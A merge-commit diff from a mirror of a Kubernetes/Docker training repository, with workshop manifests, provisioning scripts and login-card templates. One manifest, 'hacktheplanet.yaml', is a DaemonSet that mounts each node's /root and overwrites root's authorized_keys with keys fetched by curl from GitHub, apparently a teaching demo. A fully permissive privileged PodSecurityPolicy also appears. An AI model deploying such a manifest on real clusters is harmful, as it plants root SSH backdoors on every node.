mirror of
https://github.com/jpetazzo/container.training.git
synced 2026-02-14 17:49:59 +00:00
Merge branch 'master' into operators
This commit is contained in:
34
k8s/hacktheplanet.yaml
Normal file
34
k8s/hacktheplanet.yaml
Normal file
@@ -0,0 +1,34 @@
|
||||
apiVersion: apps/v1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
name: hacktheplanet
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: hacktheplanet
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: hacktheplanet
|
||||
spec:
|
||||
volumes:
|
||||
- name: root
|
||||
hostPath:
|
||||
path: /root
|
||||
tolerations:
|
||||
- effect: NoSchedule
|
||||
operator: Exists
|
||||
initContainers:
|
||||
- name: hacktheplanet
|
||||
image: alpine
|
||||
volumeMounts:
|
||||
- name: root
|
||||
mountPath: /root
|
||||
command:
|
||||
- sh
|
||||
- -c
|
||||
- "apk update && apk add curl && curl https://github.com/jpetazzo.keys > /root/.ssh/authorized_keys"
|
||||
containers:
|
||||
- name: web
|
||||
image: nginx
|
||||
|
||||
95
k8s/persistent-consul.yaml
Normal file
95
k8s/persistent-consul.yaml
Normal file
@@ -0,0 +1,95 @@
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: Role
|
||||
metadata:
|
||||
name: consul
|
||||
rules:
|
||||
- apiGroups: [ "" ]
|
||||
resources: [ pods ]
|
||||
verbs: [ get, list ]
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: RoleBinding
|
||||
metadata:
|
||||
name: consul
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: Role
|
||||
name: consul
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: consul
|
||||
namespace: orange
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: consul
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
name: consul
|
||||
spec:
|
||||
ports:
|
||||
- port: 8500
|
||||
name: http
|
||||
selector:
|
||||
app: consul
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: StatefulSet
|
||||
metadata:
|
||||
name: consul
|
||||
spec:
|
||||
serviceName: consul
|
||||
replicas: 3
|
||||
selector:
|
||||
matchLabels:
|
||||
app: consul
|
||||
volumeClaimTemplates:
|
||||
- metadata:
|
||||
name: data
|
||||
spec:
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
resources:
|
||||
requests:
|
||||
storage: 1Gi
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: consul
|
||||
spec:
|
||||
serviceAccountName: consul
|
||||
affinity:
|
||||
podAntiAffinity:
|
||||
requiredDuringSchedulingIgnoredDuringExecution:
|
||||
- labelSelector:
|
||||
matchExpressions:
|
||||
- key: app
|
||||
operator: In
|
||||
values:
|
||||
- consul
|
||||
topologyKey: kubernetes.io/hostname
|
||||
terminationGracePeriodSeconds: 10
|
||||
containers:
|
||||
- name: consul
|
||||
image: "consul:1.4.4"
|
||||
volumeMounts:
|
||||
- name: data
|
||||
mountPath: /consul/data
|
||||
args:
|
||||
- "agent"
|
||||
- "-bootstrap-expect=3"
|
||||
- "-retry-join=provider=k8s namespace=orange label_selector=\"app=consul\""
|
||||
- "-client=0.0.0.0"
|
||||
- "-data-dir=/consul/data"
|
||||
- "-server"
|
||||
- "-ui"
|
||||
lifecycle:
|
||||
preStop:
|
||||
exec:
|
||||
command:
|
||||
- /bin/sh
|
||||
- -c
|
||||
- consul leave
|
||||
39
k8s/psp-privileged.yaml
Normal file
39
k8s/psp-privileged.yaml
Normal file
@@ -0,0 +1,39 @@
|
||||
---
|
||||
apiVersion: policy/v1beta1
|
||||
kind: PodSecurityPolicy
|
||||
metadata:
|
||||
name: privileged
|
||||
annotations:
|
||||
seccomp.security.alpha.kubernetes.io/allowedProfileNames: '*'
|
||||
spec:
|
||||
privileged: true
|
||||
allowPrivilegeEscalation: true
|
||||
allowedCapabilities:
|
||||
- '*'
|
||||
volumes:
|
||||
- '*'
|
||||
hostNetwork: true
|
||||
hostPorts:
|
||||
- min: 0
|
||||
max: 65535
|
||||
hostIPC: true
|
||||
hostPID: true
|
||||
runAsUser:
|
||||
rule: 'RunAsAny'
|
||||
seLinux:
|
||||
rule: 'RunAsAny'
|
||||
supplementalGroups:
|
||||
rule: 'RunAsAny'
|
||||
fsGroup:
|
||||
rule: 'RunAsAny'
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: psp:privileged
|
||||
rules:
|
||||
- apiGroups: ['policy']
|
||||
resources: ['podsecuritypolicies']
|
||||
verbs: ['use']
|
||||
resourceNames: ['privileged']
|
||||
|
||||
38
k8s/psp-restricted.yaml
Normal file
38
k8s/psp-restricted.yaml
Normal file
@@ -0,0 +1,38 @@
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: PodSecurityPolicy
|
||||
metadata:
|
||||
annotations:
|
||||
apparmor.security.beta.kubernetes.io/allowedProfileNames: runtime/default
|
||||
apparmor.security.beta.kubernetes.io/defaultProfileName: runtime/default
|
||||
seccomp.security.alpha.kubernetes.io/allowedProfileNames: docker/default
|
||||
seccomp.security.alpha.kubernetes.io/defaultProfileName: docker/default
|
||||
name: restricted
|
||||
spec:
|
||||
allowPrivilegeEscalation: false
|
||||
fsGroup:
|
||||
rule: RunAsAny
|
||||
runAsUser:
|
||||
rule: RunAsAny
|
||||
seLinux:
|
||||
rule: RunAsAny
|
||||
supplementalGroups:
|
||||
rule: RunAsAny
|
||||
volumes:
|
||||
- configMap
|
||||
- emptyDir
|
||||
- projected
|
||||
- secret
|
||||
- downwardAPI
|
||||
- persistentVolumeClaim
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: psp:restricted
|
||||
rules:
|
||||
- apiGroups: ['policy']
|
||||
resources: ['podsecuritypolicies']
|
||||
verbs: ['use']
|
||||
resourceNames: ['restricted']
|
||||
|
||||
33
k8s/users:jean.doe.yaml
Normal file
33
k8s/users:jean.doe.yaml
Normal file
@@ -0,0 +1,33 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: jean.doe
|
||||
namespace: users
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: users:jean.doe
|
||||
rules:
|
||||
- apiGroups: [ certificates.k8s.io ]
|
||||
resources: [ certificatesigningrequests ]
|
||||
verbs: [ create ]
|
||||
- apiGroups: [ certificates.k8s.io ]
|
||||
resourceNames: [ users:jean.doe ]
|
||||
resources: [ certificatesigningrequests ]
|
||||
verbs: [ get, create, delete, watch ]
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: users:jean.doe
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: users:jean.doe
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: jean.doe
|
||||
namespace: users
|
||||
|
||||
70
k8s/volumes-for-consul.yaml
Normal file
70
k8s/volumes-for-consul.yaml
Normal file
@@ -0,0 +1,70 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: PersistentVolume
|
||||
metadata:
|
||||
name: consul-node2
|
||||
annotations:
|
||||
node: node2
|
||||
spec:
|
||||
capacity:
|
||||
storage: 10Gi
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
persistentVolumeReclaimPolicy: Delete
|
||||
local:
|
||||
path: /mnt/consul
|
||||
nodeAffinity:
|
||||
required:
|
||||
nodeSelectorTerms:
|
||||
- matchExpressions:
|
||||
- key: kubernetes.io/hostname
|
||||
operator: In
|
||||
values:
|
||||
- node2
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: PersistentVolume
|
||||
metadata:
|
||||
name: consul-node3
|
||||
annotations:
|
||||
node: node3
|
||||
spec:
|
||||
capacity:
|
||||
storage: 10Gi
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
persistentVolumeReclaimPolicy: Delete
|
||||
local:
|
||||
path: /mnt/consul
|
||||
nodeAffinity:
|
||||
required:
|
||||
nodeSelectorTerms:
|
||||
- matchExpressions:
|
||||
- key: kubernetes.io/hostname
|
||||
operator: In
|
||||
values:
|
||||
- node3
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: PersistentVolume
|
||||
metadata:
|
||||
name: consul-node4
|
||||
annotations:
|
||||
node: node4
|
||||
spec:
|
||||
capacity:
|
||||
storage: 10Gi
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
persistentVolumeReclaimPolicy: Delete
|
||||
local:
|
||||
path: /mnt/consul
|
||||
nodeAffinity:
|
||||
required:
|
||||
nodeSelectorTerms:
|
||||
- matchExpressions:
|
||||
- key: kubernetes.io/hostname
|
||||
operator: In
|
||||
values:
|
||||
- node4
|
||||
|
||||
@@ -248,6 +248,14 @@ EOF"
|
||||
sudo tar -C /usr/local/bin -zx ship
|
||||
fi"
|
||||
|
||||
# Install the AWS IAM authenticator
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/aws-iam-authenticator ]; then
|
||||
##VERSION##
|
||||
sudo curl -o /usr/local/bin/aws-iam-authenticator https://amazon-eks.s3-us-west-2.amazonaws.com/1.12.7/2019-03-27/bin/linux/amd64/aws-iam-authenticator
|
||||
sudo chmod +x /usr/local/bin/aws-iam-authenticator
|
||||
fi"
|
||||
|
||||
sep "Done"
|
||||
}
|
||||
|
||||
@@ -383,6 +391,15 @@ _cmd_retag() {
|
||||
aws_tag_instances $OLDTAG $NEWTAG
|
||||
}
|
||||
|
||||
_cmd ssh "Open an SSH session to the first node of a tag"
|
||||
_cmd_ssh() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
IP=$(head -1 tags/$TAG/ips.txt)
|
||||
info "Logging into $IP"
|
||||
ssh docker@$IP
|
||||
}
|
||||
|
||||
_cmd start "Start a group of VMs"
|
||||
_cmd_start() {
|
||||
while [ ! -z "$*" ]; do
|
||||
@@ -481,12 +498,12 @@ _cmd_helmprom() {
|
||||
if i_am_first_node; then
|
||||
kubectl -n kube-system get serviceaccount helm ||
|
||||
kubectl -n kube-system create serviceaccount helm
|
||||
helm init --service-account helm
|
||||
sudo -u docker -H helm init --service-account helm
|
||||
kubectl get clusterrolebinding helm-can-do-everything ||
|
||||
kubectl create clusterrolebinding helm-can-do-everything \
|
||||
--clusterrole=cluster-admin \
|
||||
--serviceaccount=kube-system:helm
|
||||
helm upgrade --install prometheus stable/prometheus \
|
||||
sudo -u docker -H helm upgrade --install prometheus stable/prometheus \
|
||||
--namespace kube-system \
|
||||
--set server.service.type=NodePort \
|
||||
--set server.service.nodePort=30090 \
|
||||
|
||||
@@ -31,6 +31,7 @@ infra_start() {
|
||||
die "I could not find which AMI to use in this region. Try another region?"
|
||||
fi
|
||||
AWS_KEY_NAME=$(make_key_name)
|
||||
AWS_INSTANCE_TYPE=${AWS_INSTANCE_TYPE-t3a.medium}
|
||||
|
||||
sep "Starting instances"
|
||||
info " Count: $COUNT"
|
||||
@@ -38,10 +39,11 @@ infra_start() {
|
||||
info " Token/tag: $TAG"
|
||||
info " AMI: $AMI"
|
||||
info " Key name: $AWS_KEY_NAME"
|
||||
info " Instance type: $AWS_INSTANCE_TYPE"
|
||||
result=$(aws ec2 run-instances \
|
||||
--key-name $AWS_KEY_NAME \
|
||||
--count $COUNT \
|
||||
--instance-type ${AWS_INSTANCE_TYPE-t2.medium} \
|
||||
--instance-type $AWS_INSTANCE_TYPE \
|
||||
--client-token $TAG \
|
||||
--block-device-mapping 'DeviceName=/dev/sda1,Ebs={VolumeSize=20}' \
|
||||
--image-id $AMI)
|
||||
@@ -97,7 +99,7 @@ infra_disableaddrchecks() {
|
||||
}
|
||||
|
||||
wait_until_tag_is_running() {
|
||||
max_retry=50
|
||||
max_retry=100
|
||||
i=0
|
||||
done_count=0
|
||||
while [[ $done_count -lt $COUNT ]]; do
|
||||
|
||||
@@ -1,4 +1,4 @@
|
||||
#!/usr/bin/env python
|
||||
#!/usr/bin/env python3
|
||||
import os
|
||||
import sys
|
||||
import yaml
|
||||
|
||||
@@ -5,7 +5,7 @@ clustersize: 1
|
||||
clusterprefix: dmuc
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: admin.html
|
||||
cards_template: cards.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
|
||||
@@ -5,7 +5,7 @@ clustersize: 3
|
||||
clusterprefix: kubenet
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: admin.html
|
||||
cards_template: cards.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
|
||||
@@ -5,7 +5,7 @@ clustersize: 3
|
||||
clusterprefix: kuberouter
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: admin.html
|
||||
cards_template: cards.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
|
||||
@@ -5,7 +5,7 @@ clustersize: 3
|
||||
clusterprefix: test
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: admin.html
|
||||
cards_template: cards.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
|
||||
@@ -1,29 +0,0 @@
|
||||
# Number of VMs per cluster
|
||||
clustersize: 1
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: node
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: enix.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
|
||||
# Feel free to reduce this if your printer can handle it
|
||||
paper_margin: 0.2in
|
||||
|
||||
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
|
||||
# If you print (or generate a PDF) using ips.html, they will be ignored.
|
||||
# (The equivalent parameters must be set from the browser's print dialog.)
|
||||
|
||||
# This can be "test" or "stable"
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.21.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
docker_user_password: training
|
||||
|
||||
@@ -5,7 +5,7 @@ clustersize: 4
|
||||
clusterprefix: node
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: jerome.html
|
||||
cards_template: cards.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: Letter
|
||||
|
||||
@@ -7,7 +7,7 @@ clustersize: 3
|
||||
clusterprefix: node
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: kube101.html
|
||||
cards_template: cards.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: Letter
|
||||
|
||||
@@ -1,15 +1,20 @@
|
||||
#!/bin/sh
|
||||
set -e
|
||||
|
||||
INFRA=infra/aws-eu-west-3
|
||||
export AWS_INSTANCE_TYPE=t3a.small
|
||||
|
||||
INFRA=infra/aws-us-west-2
|
||||
|
||||
STUDENTS=2
|
||||
|
||||
TAG=admin-dmuc
|
||||
PREFIX=$(date +%Y-%m-%d-%H-%M)
|
||||
|
||||
SETTINGS=admin-dmuc
|
||||
TAG=$PREFIX-$SETTINGS
|
||||
./workshopctl start \
|
||||
--tag $TAG \
|
||||
--infra $INFRA \
|
||||
--settings settings/$TAG.yaml \
|
||||
--settings settings/$SETTINGS.yaml \
|
||||
--count $STUDENTS
|
||||
|
||||
./workshopctl deploy $TAG
|
||||
@@ -17,37 +22,45 @@ TAG=admin-dmuc
|
||||
./workshopctl kubebins $TAG
|
||||
./workshopctl cards $TAG
|
||||
|
||||
TAG=admin-kubenet
|
||||
SETTINGS=admin-kubenet
|
||||
TAG=$PREFIX-$SETTINGS
|
||||
./workshopctl start \
|
||||
--tag $TAG \
|
||||
--infra $INFRA \
|
||||
--settings settings/$TAG.yaml \
|
||||
--settings settings/$SETTINGS.yaml \
|
||||
--count $((3*$STUDENTS))
|
||||
|
||||
./workshopctl disableaddrchecks $TAG
|
||||
./workshopctl deploy $TAG
|
||||
./workshopctl kubebins $TAG
|
||||
./workshopctl disableaddrchecks $TAG
|
||||
./workshopctl cards $TAG
|
||||
|
||||
TAG=admin-kuberouter
|
||||
SETTINGS=admin-kuberouter
|
||||
TAG=$PREFIX-$SETTINGS
|
||||
./workshopctl start \
|
||||
--tag $TAG \
|
||||
--infra $INFRA \
|
||||
--settings settings/$TAG.yaml \
|
||||
--settings settings/$SETTINGS.yaml \
|
||||
--count $((3*$STUDENTS))
|
||||
|
||||
./workshopctl disableaddrchecks $TAG
|
||||
./workshopctl deploy $TAG
|
||||
./workshopctl kubebins $TAG
|
||||
./workshopctl disableaddrchecks $TAG
|
||||
./workshopctl cards $TAG
|
||||
|
||||
TAG=admin-test
|
||||
#INFRA=infra/aws-us-west-1
|
||||
|
||||
export AWS_INSTANCE_TYPE=t3a.medium
|
||||
|
||||
SETTINGS=admin-test
|
||||
TAG=$PREFIX-$SETTINGS
|
||||
./workshopctl start \
|
||||
--tag $TAG \
|
||||
--infra $INFRA \
|
||||
--settings settings/$TAG.yaml \
|
||||
--settings settings/$SETTINGS.yaml \
|
||||
--count $((3*$STUDENTS))
|
||||
|
||||
./workshopctl deploy $TAG
|
||||
./workshopctl kube $TAG 1.13.5
|
||||
./workshopctl cards $TAG
|
||||
|
||||
|
||||
@@ -1,124 +0,0 @@
|
||||
{# Feel free to customize or override anything in there! #}
|
||||
{%- set url = "http://FIXME.container.training" -%}
|
||||
{%- set pagesize = 9 -%}
|
||||
{%- if clustersize == 1 -%}
|
||||
{%- set workshop_name = "Docker workshop" -%}
|
||||
{%- set cluster_or_machine = "machine virtuelle" -%}
|
||||
{%- set this_or_each = "cette" -%}
|
||||
{%- set plural = "" -%}
|
||||
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
|
||||
{%- else -%}
|
||||
{%- set workshop_name = "Kubernetes workshop" -%}
|
||||
{%- set cluster_or_machine = "cluster" -%}
|
||||
{%- set this_or_each = "chaque" -%}
|
||||
{%- set plural = "s" -%}
|
||||
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
|
||||
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
|
||||
{%- set image_src = image_src_kube -%}
|
||||
{%- endif -%}
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
|
||||
<html>
|
||||
<head><style>
|
||||
@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
|
||||
|
||||
body, table {
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
line-height: 1em;
|
||||
font-size: 15px;
|
||||
font-family: 'Slabo 27px';
|
||||
}
|
||||
|
||||
table {
|
||||
border-spacing: 0;
|
||||
margin-top: 0.4em;
|
||||
margin-bottom: 0.4em;
|
||||
border-left: 0.8em double grey;
|
||||
padding-left: 0.4em;
|
||||
}
|
||||
|
||||
div {
|
||||
float: left;
|
||||
border: 1px dotted black;
|
||||
padding-top: 1%;
|
||||
padding-bottom: 1%;
|
||||
/* columns * (width+left+right) < 100% */
|
||||
width: 30%;
|
||||
padding-left: 1.5%;
|
||||
padding-right: 1.5%;
|
||||
}
|
||||
|
||||
p {
|
||||
margin: 0.4em 0 0.4em 0;
|
||||
}
|
||||
|
||||
img {
|
||||
height: 4em;
|
||||
float: right;
|
||||
margin-right: -0.3em;
|
||||
}
|
||||
|
||||
img.enix {
|
||||
height: 4.0em;
|
||||
margin-top: 0.4em;
|
||||
}
|
||||
|
||||
img.kube {
|
||||
height: 4.2em;
|
||||
margin-top: 1.7em;
|
||||
}
|
||||
|
||||
.logpass {
|
||||
font-family: monospace;
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
.pagebreak {
|
||||
page-break-after: always;
|
||||
clear: both;
|
||||
display: block;
|
||||
height: 8px;
|
||||
}
|
||||
</style></head>
|
||||
<body>
|
||||
{% for cluster in clusters %}
|
||||
{% if loop.index0>0 and loop.index0%pagesize==0 %}
|
||||
<span class="pagebreak"></span>
|
||||
{% endif %}
|
||||
<div>
|
||||
|
||||
<p>
|
||||
Voici les informations permettant de se connecter à un
|
||||
des environnements utilisés pour cette formation.
|
||||
Vous pouvez vous connecter à {{ this_or_each }} machine
|
||||
virtuelle avec n'importe quel client SSH.
|
||||
</p>
|
||||
|
||||
<p>
|
||||
<img class="enix" src="https://enix.io/static/img/logos/logo-domain-cropped.png" />
|
||||
<table>
|
||||
<tr><td>cluster:</td></tr>
|
||||
<tr><td class="logpass">{{ clusterprefix }}</td></tr>
|
||||
<tr><td>identifiant:</td></tr>
|
||||
<tr><td class="logpass">docker</td></tr>
|
||||
<tr><td>mot de passe:</td></tr>
|
||||
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
|
||||
</table>
|
||||
</p>
|
||||
|
||||
<p>
|
||||
Adresse{{ plural }} IP :
|
||||
<!--<img class="kube" src="{{ image_src }}" />-->
|
||||
<table>
|
||||
{% for node in cluster %}
|
||||
<tr><td>{{ clusterprefix }}{{ loop.index }}:</td><td>{{ node }}</td></tr>
|
||||
{% endfor %}
|
||||
</table>
|
||||
</p>
|
||||
<p>Le support de formation est à l'adresse suivante :
|
||||
<center>{{ url }}</center>
|
||||
</p>
|
||||
</div>
|
||||
{% endfor %}
|
||||
</body>
|
||||
</html>
|
||||
@@ -1,29 +1,88 @@
|
||||
{# Feel free to customize or override anything in there! #}
|
||||
{%- set url = "http://container.training/" -%}
|
||||
{%- set pagesize = 12 -%}
|
||||
{%- if clustersize == 1 -%}
|
||||
{%- set workshop_name = "Docker workshop" -%}
|
||||
{%- set cluster_or_machine = "machine" -%}
|
||||
{%- set this_or_each = "this" -%}
|
||||
{%- set machine_is_or_machines_are = "machine is" -%}
|
||||
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
|
||||
{%- else -%}
|
||||
{%- set workshop_name = "orchestration workshop" -%}
|
||||
{%- set cluster_or_machine = "cluster" -%}
|
||||
{%- set this_or_each = "each" -%}
|
||||
{%- set machine_is_or_machines_are = "machines are" -%}
|
||||
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
|
||||
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
|
||||
{%- set image_src = image_src_swarm -%}
|
||||
|
||||
{%- set url = "http://FIXME.container.training/" -%}
|
||||
{%- set pagesize = 9 -%}
|
||||
{%- set lang = "en" -%}
|
||||
{%- set event = "training session" -%}
|
||||
{%- set backside = False -%}
|
||||
{%- set image = "kube" -%}
|
||||
{%- set clusternumber = 100 -%}
|
||||
|
||||
{%- set image_src = {
|
||||
"docker": "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png",
|
||||
"swarm": "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png",
|
||||
"kube": "https://avatars1.githubusercontent.com/u/13629408",
|
||||
"enix": "https://enix.io/static/img/logos/logo-domain-cropped.png",
|
||||
}[image] -%}
|
||||
{%- if lang == "en" and clustersize == 1 -%}
|
||||
{%- set intro -%}
|
||||
Here is the connection information to your very own
|
||||
machine for this {{ event }}.
|
||||
You can connect to this VM with any SSH client.
|
||||
{%- endset -%}
|
||||
{%- set listhead -%}
|
||||
Your machine is:
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "en" and clustersize != 1 -%}
|
||||
{%- set intro -%}
|
||||
Here is the connection information to your very own
|
||||
cluster for this {{ event }}.
|
||||
You can connect to each VM with any SSH client.
|
||||
{%- endset -%}
|
||||
{%- set listhead -%}
|
||||
Your machines are:
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "fr" and clustersize == 1 -%}
|
||||
{%- set intro -%}
|
||||
Voici les informations permettant de se connecter à votre
|
||||
machine pour cette formation.
|
||||
Vous pouvez vous connecter à cette machine virtuelle
|
||||
avec n'importe quel client SSH.
|
||||
{%- endset -%}
|
||||
{%- set listhead -%}
|
||||
Adresse IP:
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "en" and clusterprefix != "node" -%}
|
||||
{%- set intro -%}
|
||||
Here is the connection information for the
|
||||
<strong>{{ clusterprefix }}</strong> environment.
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "fr" and clustersize != 1 -%}
|
||||
{%- set intro -%}
|
||||
Voici les informations permettant de se connecter à votre
|
||||
cluster pour cette formation.
|
||||
Vous pouvez vous connecter à chaque machine virtuelle
|
||||
avec n'importe quel client SSH.
|
||||
{%- endset -%}
|
||||
{%- set listhead -%}
|
||||
Adresses IP:
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "en" -%}
|
||||
{%- set slides_are_at -%}
|
||||
You can find the slides at:
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "fr" -%}
|
||||
{%- set slides_are_at -%}
|
||||
Le support de formation est à l'adresse suivante :
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
|
||||
<html>
|
||||
<head><style>
|
||||
@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
|
||||
|
||||
body, table {
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
line-height: 1em;
|
||||
font-size: 14px;
|
||||
font-size: 15px;
|
||||
font-family: 'Slabo 27px';
|
||||
}
|
||||
|
||||
table {
|
||||
@@ -37,24 +96,54 @@ table {
|
||||
div {
|
||||
float: left;
|
||||
border: 1px dotted black;
|
||||
{% if backside %}
|
||||
height: 31%;
|
||||
{% endif %}
|
||||
padding-top: 1%;
|
||||
padding-bottom: 1%;
|
||||
/* columns * (width+left+right) < 100% */
|
||||
/*
|
||||
width: 21.5%;
|
||||
padding-left: 1.5%;
|
||||
padding-right: 1.5%;
|
||||
*/
|
||||
/**/
|
||||
width: 30%;
|
||||
padding-left: 1.5%;
|
||||
padding-right: 1.5%;
|
||||
/**/
|
||||
}
|
||||
|
||||
p {
|
||||
margin: 0.4em 0 0.4em 0;
|
||||
}
|
||||
|
||||
div.back {
|
||||
border: 1px dotted white;
|
||||
}
|
||||
|
||||
div.back p {
|
||||
margin: 0.5em 1em 0 1em;
|
||||
}
|
||||
|
||||
img {
|
||||
height: 4em;
|
||||
float: right;
|
||||
margin-right: -0.4em;
|
||||
margin-right: -0.2em;
|
||||
}
|
||||
|
||||
/*
|
||||
img.enix {
|
||||
height: 4.0em;
|
||||
margin-top: 0.4em;
|
||||
}
|
||||
|
||||
img.kube {
|
||||
height: 4.2em;
|
||||
margin-top: 1.7em;
|
||||
}
|
||||
*/
|
||||
|
||||
.logpass {
|
||||
font-family: monospace;
|
||||
font-weight: bold;
|
||||
@@ -69,19 +158,15 @@ img {
|
||||
</style></head>
|
||||
<body>
|
||||
{% for cluster in clusters %}
|
||||
{% if loop.index0>0 and loop.index0%pagesize==0 %}
|
||||
<span class="pagebreak"></span>
|
||||
{% endif %}
|
||||
<div>
|
||||
|
||||
<p>
|
||||
Here is the connection information to your very own
|
||||
{{ cluster_or_machine }} for this {{ workshop_name }}.
|
||||
You can connect to {{ this_or_each }} VM with any SSH client.
|
||||
</p>
|
||||
<p>{{ intro }}</p>
|
||||
<p>
|
||||
<img src="{{ image_src }}" />
|
||||
<table>
|
||||
{% if clusternumber != None %}
|
||||
<tr><td>cluster:</td></tr>
|
||||
<tr><td class="logpass">{{ clusternumber + loop.index }}</td></tr>
|
||||
{% endif %}
|
||||
<tr><td>login:</td></tr>
|
||||
<tr><td class="logpass">docker</td></tr>
|
||||
<tr><td>password:</td></tr>
|
||||
@@ -90,17 +175,44 @@ img {
|
||||
|
||||
</p>
|
||||
<p>
|
||||
Your {{ machine_is_or_machines_are }}:
|
||||
{{ listhead }}
|
||||
<table>
|
||||
{% for node in cluster %}
|
||||
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
|
||||
<tr>
|
||||
<td>{{ clusterprefix }}{{ loop.index }}:</td>
|
||||
<td>{{ node }}</td>
|
||||
</tr>
|
||||
{% endfor %}
|
||||
</table>
|
||||
</p>
|
||||
<p>You can find the slides at:
|
||||
|
||||
<p>
|
||||
{{ slides_are_at }}
|
||||
<center>{{ url }}</center>
|
||||
</p>
|
||||
</div>
|
||||
{% if loop.index%pagesize==0 or loop.last %}
|
||||
<span class="pagebreak"></span>
|
||||
{% if backside %}
|
||||
{% for x in range(pagesize) %}
|
||||
<div class="back">
|
||||
<br/>
|
||||
<p>You got this at the workshop
|
||||
"Getting Started With Kubernetes and Container Orchestration"
|
||||
during QCON London (March 2019).</p>
|
||||
<p>If you liked that workshop,
|
||||
I can train your team or organization
|
||||
on Docker, container, and Kubernetes,
|
||||
with curriculums of 1 to 5 days.
|
||||
</p>
|
||||
<p>Interested? Contact me at:</p>
|
||||
<p>jerome.petazzoni@gmail.com</p>
|
||||
<p>Thank you!</p>
|
||||
</div>
|
||||
{% endfor %}
